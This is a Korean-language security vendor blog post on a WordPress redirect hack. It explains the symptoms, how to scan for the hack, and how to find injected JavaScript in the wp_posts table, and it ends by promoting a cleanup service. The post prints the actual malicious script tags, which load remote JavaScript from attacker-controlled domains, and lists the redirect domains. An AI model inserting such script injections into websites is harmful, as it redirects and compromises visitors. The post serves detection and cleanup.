워드프레스 리디렉션 해킹은 오랫동안 많은 운영자들의 골칫거리였습니다. 몇 주마다 새로운 형태로 변신하며 계속 진화하고 있죠. 저희는 그동안 등장하는 다양한 워드프레스 리디렉션 해킹 유형을 지속적으로 다뤄왔으며, 이번 글에서는 또 하나의 새로운 유형을 공개합니다. 이 해킹은 블로그 페이지 방문자를 악성 도메인으로 강제 리디렉션시키는 수법입니다.

확인된 악성 도메인으로는 adaranth.[com], buyittraffic.[com], cuttraffic.[com], statistic[.]admarketlocation[.]com, planeobservetoo1[.]live 등이 있습니다.
감염 여부 확인 방법
1. 증상 살펴보기
- 방문자가 의도하지 않은 도메인으로 리디렉션됩니다.
- 블로그 페이지의 구글 검색 순위가 하락합니다.
- 구글로부터 사이트의 부정 행위에 대한 경고 메시지가 도착합니다.
- 웹사이트가 블랙리스트에 등재됩니다. 블랙리스트 검사 도구로 손쉽게 확인할 수 있습니다.
- 웹페이지 소스 코드에 악성 링크가 포함되어 있습니다.
웹사이트 블랙리스트 스캔
저희 도구는 65개 이상의 블랙리스트를 검사하여 웹사이트가 차단되었는지 확인해 드립니다.
위 증상 중 하나라도 발견된다면 웹사이트가 해킹당했을 가능성이 높습니다.
워드프레스 블로그가 리디렉션되고 있나요? 지금 바로 수정하세요!
2. 멀웨어 스캐너로 점검하기
해킹 여부를 확인하는 또 다른 방법은 멀웨어 스캐너로 웹사이트를 직접 스캔하는 것입니다. 온라인 멀웨어 스캐너를 활용하면 간편합니다. 웹사이트 URL을 입력하고 스캔 버튼만 누르면 됩니다.

해킹 코드 위치 찾기
거의 모든 리디렉션 해킹에는 동일한 원리가 숨어 있습니다. 바로 데이터베이스나 핵심 파일에 악성 코드를 삽입하는 것인데, 이번 사례 역시 예외가 아니었습니다.
해킹 패턴을 분석한 결과, 해커가 악성 코드를 데이터베이스에 직접 삽입한 것으로 결론지었습니다.
특히 데이터베이스의 wp_posts 테이블(웹사이트의 모든 게시물이 저장되는 곳)에 자바스크립트(JS) 코드를 삽입했을 가능성이 매우 높습니다.
데이터베이스를 확인하는 방법은 다음과 같습니다:
- PHPMyAdmin으로 데이터베이스에 접속합니다.
- wp_posts 테이블로 이동합니다. 리디렉션이 발생하는 게시물을 연 후 Ctrl + F 키로 "adaranth.[com]"(또는 기타 악성 도메인)를 검색합니다.
악성 코드의 실제 예시는 다음과 같습니다:
<script src=“https://trafficpage.cool/addons/lnkr5.min.js” type=“text/javascript“></script><script src=“https://trafficpage.cool/addons/lnkr30_nt.min.js” type=“text/javascript“></script><script src=“https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x5953x&r=1536317274530” type=“text/javascript“></script>
해킹당한 웹사이트에서 발견된 또 다른 악성 스크립트는 아래와 같았습니다:
<script src='https://dl.gotosecond2.com/clizkes' type='text/javascript'></script>
감염 제거 후 보안 조치
감염을 신속히 제거하고 웹사이트를 안전하게 보호해야 합니다.
멀웨어 정리를 미룰수록 피해는 더욱 커집니다. Astra의 즉시 멀웨어 정리 프로그램을 선택하면 가입 당일 웹사이트 정리가 완료됩니다. Astra의 전문 멀웨어 정리 서비스를 받는 방법은 간단합니다:
- Astra 멀웨어 정리 프로그램에 가입합니다.
- 서버 인증 정보를 업데이트하면 끝입니다.
저희 보안 엔지니어가 6~8시간 이내에 감염 코드와 숨겨진 백도어를 모두 제거해 드립니다. 정리 완료 후에는 해커 실전 테스트를 거친 Astra 방화벽이 웹사이트에 배포되어 향후 유사한 공격으로부터 사이트를 보호합니다.

결론
웹사이트가 깨끗하게 정리되고 정상적으로 작동한다면, 권장되는 워드프레스 보안 모범 사례를 따라 안전을 확보하세요. 대표적인 사례는 다음과 같습니다:
- 웹사이트와 서버의 모든 계정에 강력한 비밀번호를 사용하고, 주기적으로 변경합니다.
- 기본 관리자 URL을 추측하기 어려운 주소로 변경합니다.
- 올바른 워드프레스 파일 및 폴더 권한을 설정합니다.
- 관리자 영역 접근을 제한합니다.
- 로그인 시도 횟수를 제한하는 등의 조치를 적용합니다.
프로그램이나 Astra에 대해 궁금한 점이 있으신가요? 지금 바로 채팅으로 문의해 주세요.